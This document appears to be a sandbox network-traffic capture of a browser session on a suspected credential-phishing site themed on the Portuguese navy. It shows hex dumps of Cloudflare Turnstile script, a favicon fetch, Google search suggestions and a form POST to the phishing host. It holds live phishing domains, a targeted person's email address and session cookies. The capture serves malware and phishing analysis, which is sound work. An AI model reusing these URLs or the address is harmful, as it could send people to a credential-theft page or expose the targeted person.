                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                  Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                  Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 5a 7c 7c 28 5a 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72 3d 22 72
                                                                  Data Ascii: anual",e.Auto="auto"})(Z||(Z={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render="r
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29
                                                                  Data Ascii: tion pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test(e)
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44
                                                                  Data Ascii: "ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"fbD
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 65 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74
                                                                  Data Ascii: .setPrototypeOf||function(o,c){return o.__proto__=c,o},ee(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writ
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72
                                                                  Data Ascii: nfigurable:!0}}),ee(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,ar
                                                                  2025-03-14 11:30:40 UTC1369INData Raw: 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 62 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b
                                                                  Data Ascii: tion(e,t,a){var o=Tt(t.params,!1),c="h/".concat("b","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(a);


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449727104.16.2.1894435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:40 UTC651OUTGET /favicon.png HTTP/1.1
                                                                  Host: developers.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:41 UTC740INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:41 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 937
                                                                  Connection: close
                                                                  CF-Cache-Status: HIT
                                                                  Cache-Control: public, max-age=0, must-revalidate
                                                                  ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                                                  Set-Cookie: __cf_bm=dSrX1gzgW2x9wKZ5pwTkekLnw8YRJEHp0h.eAbXEEYY-1741951841-1.0.1.1-tau2sJbPciErFKr_sm9WiBMI_m3txG17vEfOJPIyP4.0HSTF.nrbPUU77Y22lUHfF..9mxzh6mVvqmlWKLRZO88vYLmXTu_V2XvjMqLGxww; path=/; expires=Fri, 14-Mar-25 12:00:41 GMT; domain=.developers.cloudflare.com; HttpOnly; Secure; SameSite=None
                                                                  Strict-Transport-Security: max-age=15552000; preload
                                                                  X-Content-Type-Options: nosniff
                                                                  access-control-allow-origin: *
                                                                  Server: cloudflare
                                                                  CF-RAY: 920370be9aa043b7-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-03-14 11:30:41 UTC629INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                                                  Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
                                                                  2025-03-14 11:30:41 UTC308INData Raw: e5 01 1a ae 24 1a 01 0f 82 94 b8 17 10 11 06 de c4 b1 28 5d f1 0e ee 39 df 2c 85 85 09 69 c6 04 d7 c0 65 d0 03 c2 20 04 ce 80 13 a0 09 1c 01 87 e4 9b b0 01 bd 5f 93 b5 e8 ca 40 13 68 01 2f 84 89 fb c2 c4 2e 16 2f 55 32 4e 64 f5 92 e4 8b e6 07 f8 2e f9 a6 f0 55 f2 05 7c 06 9f c0 7b d0 28 16 da cd ad 79 10 09 81 d7 60 0c 7c 04 e3 dc 02 7a 5c cd 06 7a d9 40 0b 6f 35 18 88 e1 2d 98 94 0b 4f f4 54 c6 54 4c 29 af 35 17 1d ce 79 b1 6d 0d 9d ab 96 0f 81 01 7a 5a e3 94 7f d8 81 b3 c7 bc c5 8b 12 f1 3a 1b b8 42 97 8a 69 0a e5 8e 77 ce 82 d2 eb 3f 21 0c f0 f6 6d 2d 78 69 f5 95 1f a6 e7 3b 9c 9e 0f 65 0c 30 c9 41 cc e1 1c 57 c7 7d bf ef 45 a6 b5 88 75 ff 0a ee e7 c8 cf 68 30 4f ad 2f c5 de df 82 55 df 00 6a 41 1d c4 ea 2c 20 a2 f3 7b 0f 28 fc ff 7f b1 f8 dd cf 5f 3d
                                                                  Data Ascii: $(]9,ie _@h/./U2Nd.U|{(y`|z\z@o5-OTTL)5ymzZ:Biw?!m-xi;e0AW}Euh0O/UjA, {(_=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449718142.250.186.684435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:41 UTC579OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCIrgzgEIruTOAQiL5c4B
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: empty
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:41 UTC1303INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:41 GMT
                                                                  Pragma: no-cache
                                                                  Expires: -1
                                                                  Cache-Control: no-cache, must-revalidate
                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-owFOwfEbGuxbHWRP2t1o6Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                  Accept-CH: Downlink
                                                                  Accept-CH: RTT
                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                  Accept-CH: Sec-CH-UA-Model
                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                  Permissions-Policy: unload=()
                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                  Server: gws
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Accept-Ranges: none
                                                                  Vary: Accept-Encoding
                                                                  Connection: close
                                                                  Transfer-Encoding: chunked
                                                                  2025-03-14 11:30:41 UTC87INData Raw: 33 37 62 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 6f 6f 6b 69 65 20 72 75 6e 20 77 65 64 64 69 6e 67 20 63 61 6b 65 20 63 6f 6f 6b 69 65 20 74 6f 70 70 69 6e 67 73 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 32 36 20 63 6f 76 65 72 22 2c 22 77
                                                                  Data Ascii: 37b)]}'["",["cookie run wedding cake cookie toppings","college football 26 cover","w
                                                                  2025-03-14 11:30:41 UTC811INData Raw: 65 61 74 68 65 72 20 73 74 6f 72 6d 73 20 61 6e 64 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 65 64 77 61 72 64 20 6a 6f 6e 65 73 20 6c 61 79 6f 66 66 73 20 73 74 20 6c 6f 75 69 73 22 2c 22 61 76 6f 77 65 64 20 75 70 64 61 74 65 20 70 61 74 63 68 20 6e 6f 74 65 73 22 2c 22 63 72 6f 73 73 66 69 74 20 6f 70 65 6e 20 32 35 2e 33 20 77 6f 72 6b 6f 75 74 73 22 2c 22 75 6e 63 6c 61 69 6d 65 64 20 74 61 78 20 72 65 66 75 6e 64 73 20 69 72 73 22 2c 22 6e 65 77 20 79 6f 72 6b 20 79 61 6e 6b 65 65 73 20 72 75 6d 6f 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67
                                                                  Data Ascii: eather storms and tornadoes","edward user layoffs st louis","avowed update patch notes","crossfit open 25.3 workouts","unclaimed tax refunds irs","new york yankees rumors"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"goog
                                                                  2025-03-14 11:30:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449733172.67.153.1604435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:54 UTC592OUTGET /kella$z8ye07 HTTP/1.1
                                                                  Host: jygdt.tjezyf.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:55 UTC824INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44KobsaqB1ikZRwtmBbJrUDIjAmsUYj1pbRg8rISsxrJKpRG1NyHRwvHyuOB%2BGYWDdcYh9vXW%2FR0D5%2Fa5GrcbNH%2F%2FPgrZfREjHYpUYp89Evp0fWPHtjVn5WbiQBwlfbw5mQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 92037115996f7c82-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1881&rtt_var=714&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1164&delivery_rate=1522419&cwnd=237&unsent_bytes=0&cid=040b56af79249c69&ts=916&x=0"
                                                                  2025-03-14 11:30:55 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                                  Data Ascii: 10
                                                                  2025-03-14 11:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449734104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:56 UTC1509OUTPOST /riWV0S6MDUPLu3h0Z0Ci4P37jqadamkj00iFg1oHVLKumIGe7o HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Content-Length: 777
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYHw8A4JYuA1D7ZVU
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkhyQmc5VDAyN3NXU0E0OG9QdXdYTkE9PSIsInZhbHVlIjoiNnBCQjF6N3JBTTladHZCMW5kRTN3b2RsNU5sODg0bTVtRE9qUDJPVDJRSjVIVGVZSVVRdURhb0RtbXpkTURPaXRaQ2tLSVIvTVdyc2xDU2ZiRGJWVjRRdzVSSGFUVXRCV0haSnErL1pKR1JyUUJJUC95WWRQTWdkWUtGNStXTG0iLCJtYWMiOiJmNzI3YTA4ODI5NGY0MDk4YjhkMTJhYTE1ZmIxZTNlNThmMjNjZTc4MDE1NGVmZWMxNTZiYzcxNjRlMTUzNzU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9OZGppNytjQ3MrVmtzczYydzJpR2c9PSIsInZhbHVlIjoiYnNqam9hMTFKTGZiQlVFcVVRT09qam40OWJTY2hXdXNON0VsNGpKbG9nSHh3TWhCK0dXSFdRS0MyVWtTbVMrZGlTdHpBSWVCYW0wRWZLd3dhMmE2KzZsWVVBQkNjeU1MZ2VwVTFvMDNsaUR6RUJRWWR3TVYrRk5ZUXE0VlZDejQiLCJtYWMiOiI3OThiZWRjZWY1MTVhNWJjYzhkY2U4NzY0ZDM3ZjZlMTk1MWNlZjgwMDBkM2FmMTNmMmEwN2YwZjhkMTZiZjE2IiwidGFnIjoiIn0%3D
